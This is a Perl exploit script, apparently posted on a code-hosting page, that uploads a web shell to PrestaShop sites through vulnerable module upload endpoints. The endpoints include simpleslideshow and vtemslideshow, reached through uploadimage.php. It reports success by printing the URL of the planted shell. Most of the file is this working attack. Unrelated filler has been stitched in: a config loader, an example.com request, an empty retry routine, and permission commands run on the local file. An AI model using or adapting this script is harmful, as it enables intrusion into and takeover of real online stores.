Spaces:
Runtime error
Runtime error
File size: 3,735 Bytes
fff4338 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 | #!/usr/bin/perl
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
use Config;
use JSON;
use IO::Async::Loop;
use Net::Async::HTTP;
print color 'reset';
# Detect OS
my $os = $Config{osname};
print "Detected OS: $os\n";
# Load configuration
my $config_file = 'config.json';
open my $fh, '<', $config_file or die "Could not open '$config_file' $!\n";
my $config = decode_json(do { local $/; <$fh> });
close $fh;
# Define user agent
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
# Check arguments
if (@ARGV < 2) {
print "Usage: perl $0 Target Shell\n";
exit;
}
my $URL = $ARGV[0];
my $FILE = $ARGV[1];
my @error = ("Shell uploaded successfully", "Target Not vulnerable");
my @PARAMETER = ("/simpleslideshow/", "/productpageadverts/", "/homepageadvertise/", "/columnadverts/", "/vtemslideshow/");
for my $PARAMETER (@PARAMETER) {
if ($URL =~ /$PARAMETER/) {
$URL =~ s/$PARAMETER(.*)//s;
my $add = $PARAMETER . "uploadimage.php";
$URL = $URL . $add;
print "SCAN: $URL\n";
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;
my $response = $ua->request(POST $URL, ['Content_Type' => 'form-data', 'userfile' => [$FILE]]);
my $shellFILE = $FILE;
if ($response->content =~ /success/) {
print color 'green';
print "$error[0] ";
$shellFILE =~ s/$Bin//g;
my $shell = "slides" . $shellFILE;
$URL =~ s/uploadimage.php/$shell/g;
print "$URL\n";
print color 'reset';
# Additional OS-specific commands
if ($os eq 'linux') {
# Linux-specific commands
print "Executing Linux-specific commands...\n";
system("chmod +x $shellFILE");
} elsif ($os eq 'MSWin32') {
# Windows-specific commands
print "Executing Windows-specific commands...\n";
system("icacls $shellFILE /grant Everyone:F");
} elsif ($os eq 'darwin') {
# macOS-specific commands
print "Executing macOS-specific commands...\n";
system("chmod +x $shellFILE");
} else {
print "OS-specific commands not defined for $os\n";
}
} else {
print color 'red';
print "$error[1]\n";
print color 'reset';
}
}
}
# Asynchronous I/O operations
my $loop = IO::Async::Loop->new;
my $http = Net::Async::HTTP->new;
$loop->add($http);
# Example asynchronous request
$http->GET('http://example.com')->then(sub {
my $response = shift;
print "Received response: " . $response->content . "\n";
})->get;
# Logging and monitoring
sub log_message {
my ($message) = @_;
open my $log_fh, '>>', 'script.log' or die "Could not open log file $!\n";
print $log_fh "$message\n";
close $log_fh;
}
log_message("Script executed successfully");
# Retry mechanism
sub retry {
my ($code, $retries) = @_;
my $attempt = 0;
while ($attempt < $retries) {
eval { $code->(); 1 } and last;
$attempt++;
sleep 1;
}
}
retry(sub {
# Code to retry
}, 3);
# Documentation and usage instructions
__END__
=head1 NAME
prestashop_shell_exploit.pl - Prestashop Modules Shell Upload Exploit
=head1 SYNOPSIS
perl prestashop_shell_exploit.pl TARGET SHELL
=head1 DESCRIPTION
This script exploits vulnerable Prestashop modules to upload a shell.
=head1 CONFIGURATION
The script uses a configuration file (config.json) for settings.
=head1 AUTHOR
Alisam Technology Team
=head1 LICENSE
This script is licensed under the GPL.
=cut
|